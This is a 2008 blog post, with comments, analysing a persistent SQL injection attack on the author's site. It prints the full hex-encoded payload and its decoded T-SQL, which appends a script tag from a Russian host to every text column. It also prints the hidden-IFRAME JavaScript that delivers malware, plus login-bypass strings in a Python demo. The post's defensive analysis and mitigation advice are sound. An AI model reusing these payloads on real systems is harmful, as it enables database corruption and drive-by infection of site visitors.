A fairly persistent series of hack attempts
Published Wed, Jul 23 2008 9:14 AM
Technorati Tags: Computers and Internet, Blogging, Annoyances
Somebody is trying to hack my site. So far they've been unsuccessful, but they are persistent. How do I know this? Every time something goes wrong in the site code (as opposed to in my hosting environment) I get an email giving me the details of the failure. That's how I know that someone is trying a SQL injection attack, and that so far they haven't succeeded: the attempt causes a failure in the page code instead of running, and the failure report lands in my inbox. They are persistent though, trying exactly the same routine over and over again.
So, what is a SQL injection attack? It is an attempt, by modifying the parameters in a query string or form post, to make your site run SQL of the attacker's choosing alongside the query it meant to run. A classic example tries to get into a secure area of a site by tampering with the parameters of a user lookup routine: a user name such as admin' -- closes the quoted value early and comments out the password check that follows it. The attack works against "dynamic SQL", where a developer takes unfiltered user input and pastes it straight into the text of the statement before executing it. The fix is to keep the statement text fixed and pass user input as query parameters, so that quotes, semicolons and comment markers in the input stay data rather than becoming part of the statement.
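The user-lookup pattern just described, built both ways, as an added example rather than code from this site (which runs on ASP.NET and SQL Server; Python and SQLite stand in here). The users table, its rows and the passwords are constructed for the example.

```python
import sqlite3

# Python and SQLite stand in for the site's ASP.NET / SQL Server code; the users
# table and its rows are constructed for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "s3cret", 1), ("reader", "hunter2", 0)])
    return conn


def lookup_dynamic(conn, username, password):
    """The 'dynamic SQL' pattern: user input pasted into the statement text."""
    sql = ("SELECT username, is_admin FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, username, password):
    """Same lookup with the values sent as parameters: the statement text never
    changes, so quotes, comments and semicolons in the input stay data."""
    sql = "SELECT username, is_admin FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Closing the quote and commenting out the password check logs in as admin
    print(lookup_dynamic(db, "admin' --", "whatever"))        # ('admin', 1)
    # A tautology matches every row; the first row back happens to be admin
    print(lookup_dynamic(db, "' OR '1'='1", "' OR '1'='1"))   # ('admin', 1)
    # The parameterized version looks for a user literally named "admin' --"
    print(lookup_parameterized(db, "admin' --", "whatever"))  # None
    print(lookup_parameterized(db, "admin", "s3cret"))        # ('admin', 1)
```

The stacked form used against this site (blogid=1;DECLARE ...) additionally needs a driver and server that accept several statements in one call, which SQL Server does; the sqlite3 module's execute() refuses a second statement, so that variant is not shown. The parameterized form defeats both.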
In any case, the attack being perpetrated here is going after my RSS feeds. They've tried fifteen times using fifteen different IP addresses in the last five hours. Here's the query string they're trying to use…
blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(
0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E61
6D652C622E6E616D652046524F4D207379736F626A6563747320612C
737973636F6C756D6E73206220574845524520612E69643D622E6964
20414E4420612E78747970653D27752720414E442028622E78747970
653D3939204F5220622E78747970653D3335204F5220622E78747970
653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D20
5461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E204558
45432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834
303030292C5B272B40432B275D29292B27273C736372697074207372
633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E
3C2F7363726970743E27272729204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E
4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
;EXEC(@S);--
I've inserted a few line-breaks into that long string so that it doesn't break my blog formatting here. I haven't seen this particular approach before, but if I were using dynamic SQL statements, building them from unfiltered user input and then executing them, it would play havoc with my site. Without all of those hexadecimal digits, here's a simplified version…
blogid=1;DECLARE @S VARCHAR(4000); SET @S=CAST(alongbinarynumber AS VARCHAR(4000));EXEC(@S);--
If it's still not clear enough, here's what they're trying to do. The injected code declares a variable named @S as a large character string, sets its value by casting a hexadecimal binary literal to a string, and then executes the resulting string as if it were a SQL statement. The semicolons separate the individual statements, so the whole thing rides along after the blogid=1 value my code expects, and the trailing -- comments out whatever the site's own SQL would have appended after the parameter. The hex literal hides the actual code from anyone skimming the logs and from simple keyword filters. I've decoded it for you here…
-- Walk every user table (xtype 'u') and every column of type ntext (99),
-- text (35), nvarchar (231) or varchar (167) in it
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
-- Append the script tag to every value in the column; the CONVERT to
-- VARCHAR(4000) also truncates anything longer than 4000 characters
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.4cnw.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
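Working through the hex by hand is slow, so here is a small decoder, added as an example and not part of the site's code. It takes the captured query string from above (with the line breaks I inserted removed), URL-decodes it, pulls out the 0x... literal and turns it back into the SQL just shown, then lists any <script src=...> the payload appends. The looks_injected check is a crude filter of my own devising for the markers a numeric id should never contain; the UTF-16 branch is an assumption about the NVARCHAR variant of the same trick, which is not the one in this post.

```python
import re
from urllib.parse import unquote

# The query string captured in this post, reassembled without the line breaks
# the author inserted (on the wire the hex literal is a single token).
CAPTURED_QUERY = (
    "blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST("
    "0x4445434C415245204054205641524348415228323535292C404320"
    "564152434841522832353529204445434C415245205461626C655F43"
    "7572736F7220435552534F5220464F522053454C45435420612E6E61"
    "6D652C622E6E616D652046524F4D207379736F626A6563747320612C"
    "737973636F6C756D6E73206220574845524520612E69643D622E6964"
    "20414E4420612E78747970653D27752720414E442028622E78747970"
    "653D3939204F5220622E78747970653D3335204F5220622E78747970"
    "653D323331204F5220622E78747970653D31363729204F50454E2054"
    "61626C655F437572736F72204645544348204E4558542046524F4D20"
    "5461626C655F437572736F7220494E544F2040542C4043205748494C"
    "4528404046455443485F5354415455533D302920424547494E204558"
    "45432827555044415445205B272B40542B275D20534554205B272B40"
    "432B275D3D525452494D28434F4E5645525428564152434841522834"
    "303030292C5B272B40432B275D29292B27273C736372697074207372"
    "633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E"
    "3C2F7363726970743E27272729204645544348204E4558542046524F"
    "4D205461626C655F437572736F7220494E544F2040542C404320454E"
    "4420434C4F5345205461626C655F437572736F72204445414C4C4F43"
    "415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))"
    ";EXEC(@S);--"
)

# A SQL Server binary literal: 0x followed by whole byte pairs.
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2})+)")

# Things a numeric id like blogid should never contain (heuristic, my own).
INJECT_MARKERS = re.compile(
    r";|\bDECLARE\b|\bCAST\s*\(|\bEXEC\s*\(|0x(?:[0-9A-Fa-f]{2}){4,}", re.I)


def decode_hex_literal(hexdigits):
    """Turn the digits after 0x into the text SQL Server would execute."""
    raw = bytes.fromhex(hexdigits)
    # CAST(0x.. AS VARCHAR) reads the bytes as single-byte characters. An
    # NVARCHAR cast (assumed variant, not the one in this post) reads UTF-16LE,
    # which for ASCII text leaves every second byte NUL.
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def decode_payload(query_string):
    """URL-decode the query string and decode every 0x literal found in it."""
    decoded = unquote(query_string)
    payloads = [decode_hex_literal(m.group(1)) for m in HEX_LITERAL.finditer(decoded)]
    return decoded, payloads


def injected_scripts(sql_text):
    """List the script sources the decoded SQL tries to append to column values."""
    return re.findall(r"<script\s+src=([^>\s]+)", sql_text, re.I)


def looks_injected(param_value):
    """True if a supposedly numeric parameter carries injection markers."""
    return INJECT_MARKERS.search(unquote(param_value)) is not None


if __name__ == "__main__":
    outer, inner = decode_payload(CAPTURED_QUERY)
    print("outer statement:", outer[:60], "...")
    for sql in inner:
        print("hidden SQL:", sql)
        print("script tags appended:", injected_scripts(sql))
    print("blogid=1 flagged?", looks_injected("1"))
    print("attack flagged?", looks_injected(CAPTURED_QUERY.split("=", 1)[1]))
```

Run against a web log, looks_injected on each blogid value picks out these requests without needing to decode them; decode_payload is for the ones you want to read.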
So what the hacker is trying to do here is to walk every user table in my database (a.xtype='u') and every text, ntext, varchar and nvarchar column in it (column types 35, 99, 167 and 231 in syscolumns), and tack the string “<script src=http://www.4cnw.ru/ngg.js></script>” onto the end of every value. Note the CONVERT(VARCHAR(4000),...) inside the UPDATE: any value longer than 4000 characters is truncated along the way, so the attack corrupts content as well as appending to it. Not only is this person trying to hack my database, they're also trying to hack my pages: any page that renders one of those columns would make your browser execute a script from a Russian web site every time you load it.
Here's the script they're trying to make my site force your browser to execute…
window.status="";
// navigator.userLanguage exists only in Internet Explorer; in other browsers this
// line throws and the script stops. The listed locales are skipped entirely.
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
  var cookieString = document.cookie;
  var start = cookieString.indexOf("vrcgoo=");
  // A browser that already carries the cookie is left alone; otherwise the cookie
  // is set for nine hours so the IFRAME is only served once in that time
  if (start != -1){}else{
    var expires = new Date();
    expires.setTime(expires.getTime()+9*3600*1000);
    document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
    try{
      // Invisible IFRAME that pulls in the exploit page
      document.write("<iframe src=http://cvsr.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    }
    catch(e) {
    };
  }}
So the script first checks the browser's language setting and does nothing for Chinese, Urdu, Russian, Korean, Hindi, Thai or Vietnamese users. For everyone else it looks for a cookie called vrcgoo; if the cookie isn't there it sets one that lasts nine hours and writes an IFRAME into the page, so each browser is only sent to the IFRAME once in nine hours. The source document for that IFRAME comes from “http://cvsr.ru/cgi-bin/index.cgi?ad”. I don't think it's necessary to dig into this much further. It's a near certainty that loading that document in your browser is meant to infect your computer with malware, and you'd never see it coming unless you have antivirus software that pops up an alert immediately. Since the IFRAME is set to have zero width, zero height, and no border, you wouldn't see the IFRAME or the document. You'd only see the effects, and they're sure to be nasty.
My fellow bloggers, if my site is under this sort of attack, you can bet that yours is too. Protect your site visitors! Make sure you're running the latest version of your blogging platform, and if you write any of your own site code, build every query with parameters rather than by pasting user input into the statement text. It's also worth checking that the database login your site uses doesn't have UPDATE rights on every table, since that is exactly what this payload needs.
Trackposted to third world county, Allie is Wired, Woman Honor Thyself, DragonLady's World, The World According to Carl, The Pink Flamingo, Leaning Straight Up, Cao's Blog, Democrat=Socialist, Dumb Ox Daily News, Conservative Cat, and Right Voices, thanks to Linkfest Haven Deluxe.
Trackback URI for this post: http://perrinelson.com/track.aspx?postid=1209
Permalink URI for this post: http://perrinelson.com/2008/7/23/1209.aspx
David responded with:
Want me to invoke that URL in a sandboxed or VM-ed browser to see what it is? Perhaps a VM with a sandboxed browser, eh? ;-)
Layla responded with:
My goodness, I did not see this post yesterday. Sorry. It was exactly this sort of hacking that took out my original blog Freedom Watch. I am not sure you remember me from that blog, but I remembered you... lol!
That looks scary and I did have a hack attempt two months ago on my old host, but I moved after that because my new host has better protections and gave me a lot of good advice that saved my blog.
I still freak at this stuff though after losing Freedom Watch like that. Thanks to Bernie, my dear friend from Planck's Constant:
http://plancksconstant.org
He found my website on WayBack Machine. I had never heard of the site until Bernie told me about it. I retrieved some old postings from there. Also, Brian Bonner from CAII has all my contributions that I wrote on illegal immigration so it turned out not to be a complete loss. But if it was not for Bernie I would still be crying over Freedom Watch.
I was so attached to that blog it took me four months and the dems winning back both houses to get my arse back in gear again!
Take care of your blog my friend. I am not sure what to say, but maybe you should take David up on his offer.
Perri Nelson responded with:
I already took him up on it, then I analyzed the web page that the IFRAME offered. It did indeed turn out to try to install malware on the box, by exploiting a buffer overrun in Internet Explorer. I've been watching for security flaws in my code for a long time. When I worked for Microsoft, there was an occasion when we actually took a month out of our development schedule to learn about security issues, and to do a comprehensive code review of the product we were building with an eye toward security. It was very instructive, and I learned how to defeat SQL injection attacks back then. I'm not 100% confident that my site is immune from attack, but I doubt that a SQL injection attack will bring it down. I'm always on the lookout for this sort of thing though, because I write software for a living. This incident has prompted me to do a thorough review of my site code to look for other potential risks and do what I can to mitigate them. I'm glad you were able to recover your posts! Bernie's site is a good one. I used to visit it a lot. Thanks for the reminder, I think I'll pay him a visit.